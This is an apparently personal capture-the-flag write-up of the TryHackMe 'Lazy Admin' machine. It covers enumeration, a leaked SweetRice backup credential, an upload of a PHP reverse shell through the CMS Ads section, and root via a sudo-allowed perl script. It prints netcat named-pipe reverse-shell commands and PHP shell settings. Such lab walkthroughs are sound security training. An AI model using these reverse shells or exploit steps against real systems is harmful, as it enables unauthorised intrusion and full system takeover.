Tryhackme — Lazy Admin

Description: Easy Linux machine to practice your skills.

Just going through the original challenges I did when I started THM and each one bringing with it, it’s own memories of “call this easy!!!” and “I’ll never get the hang of this!!”

Either way, they did get easier and I did get the hang of them. So let’s make a start by enumerating as usual:


~ ping -c 4 $IP
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=17.0 ms
64 bytes from icmp_seq=2 ttl=63 time=16.9 ms
64 bytes from icmp_seq=3 ttl=63 time=16.9 ms
64 bytes from icmp_seq=4 ttl=63 time=16.7 ms
--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 16.659/16.881/17.013/0.133 ms


~ nmap -sV -sC -A $IP    
Starting Nmap 7.92 ( ) at 2022-09-12 10:52 BST
Nmap scan report for
Host is up (0.018s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.67 seconds


~ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2022/09/12 10:56:18 Starting gobuster in directory enumeration mode
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/content (Status: 301) [Size: 314] [-->]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 277]

2022/09/12 10:56:28 Finished


So the website we have on port 80, appears to be the default Apache2 Ubuntu default page:

However with the gobuster check indicating that a content folder exists, we can look at that:

gobuster 2 — the sequel

With the contents folder found, we can check for additional SweetRice directories.

~ gobuster dir -u http://$IP/content -w /usr/share/wordlists/dirb/common.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
2022/09/12 11:00:56 Starting gobuster in directory enumeration mode
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/_themes (Status: 301) [Size: 322] [-->]
/as (Status: 301) [Size: 317] [-->]
/attachment (Status: 301) [Size: 325] [-->]
/images (Status: 301) [Size: 321] [-->]
/inc (Status: 301) [Size: 318] [-->]
/index.php (Status: 200) [Size: 2198]
/js (Status: 301) [Size: 317] [-->]

2022/09/12 11:01:04 Finished

This provides us with some additional threads we can investigate. Firstly we can check as which gives us a login screen.

Next as part of the continued enumeration we check inc which gives a list of files:

One that stands out is the backup folder:

We download that and a quick search provides us with a username and hashed password:

cat mysql_bakup_20191129023059-1.5.1.sql | grep passw
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"m******r\\";s:6:\\"passwd\\";s:32:\\"42f74************f475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

Checking the hash and putting it quickly through we get the password.

Using the credentials we gain access to the SweetRice admin panel. Luckily it provides us with the current version: 1.5.1, so a quick search on searchsploit provides us with the following:

~ searchsploit sweetrice
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
SweetRice 0.5.3 - Remote File Inclusion | php/webapps/10246.txt
SweetRice 0.6.7 - Multiple Vulnerabilities | php/webapps/15413.txt
SweetRice 1.5.1 - Arbitrary File Download | php/webapps/
SweetRice 1.5.1 - Arbitrary File Upload | php/webapps/
SweetRice 1.5.1 - Backup Disclosure | php/webapps/40718.txt
SweetRice 1.5.1 - Cross-Site Request Forgery | php/webapps/40692.html
SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution | php/webapps/40700.html
SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload | php/webapps/14184.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

So, from this we can actually see that backup disclosure, is where we got the initial username and password from. Another, the 40700 PHP code execution looks as though it could give us a reverse shell. Checking it out, we find:

~ searchsploit -x php/webapps/40700.html
# Description :
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server

So clicking on Ads gives us the opportunity to add a php reverse shell.

Using the pentestmonkeys php-reverse-shell.php and amending the file accordingly for our attacker box, we get:

set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;

Now giving the add a name and finalising it with a click on done

Remembering our second gobuster scan, we found the folder ads and if we visit it, we can see our click_me.php file. Now before we exploit it, a quick netcat session with the port we selected — 4444.

nc -nlvp 4444      
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on

And a quick curl command should start the reverse shell.


There we have it — the initial foothold on the machine.

nc -nlvp 4444      
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
13:35:35 up 52 min, 0 users, load average: 0.00, 0.00, 0.00
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Making the shell interactive:

python -c ‘import pty;pty.spawn(“/bin/bash”)’ # then press Ctrl+Z
stty raw -echo;fg # then press ENTER twice
export TERM=xterm

Let’s find out who is on the machine, with a quick check of the home folder:

Further checks then provide us with the user flag.

Next then, what can we actually do as the user www-data. A quick sudo -l gives us:

www-data@THM-Chal:/$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/

Checking out the file, we see from the ls -l that we did earlier, that we can read and execute but not write. However, it runs a further script

-rw-r--r-x 1 root  root    47 Nov 29  2019 backup.plwww-data@THM-Chal:/$ cat /home/itguy/
system("sh", "/etc/");

So now checking that file, it actually contains a bash reverse shell! From this all we need to do is amend the file with our attacker box and we are in on a root shell.

www-data@THM-Chal:/$ ls -l /etc/ 
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/
www-data@THM-Chal:/$ cat /etc/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f

In this case I used echo to get the data across. Then set up a port 5555 netcat session and ran the file with my sudo credentials.

www-data@THM-Chal:/$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5555 >/tmp/f" > /etc/copy.shwww-data@THM-Chal:/$ sudo /usr/bin/perl /home/itguy/ -nlvp 5555      
Ncat: Version 7.92 ( )
Ncat: Listening on :::5555
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt

A great little box, that I thoroughly enjoyed, but when I first started? Not so much. See how things change!!



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
James Pearson

James Pearson


20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.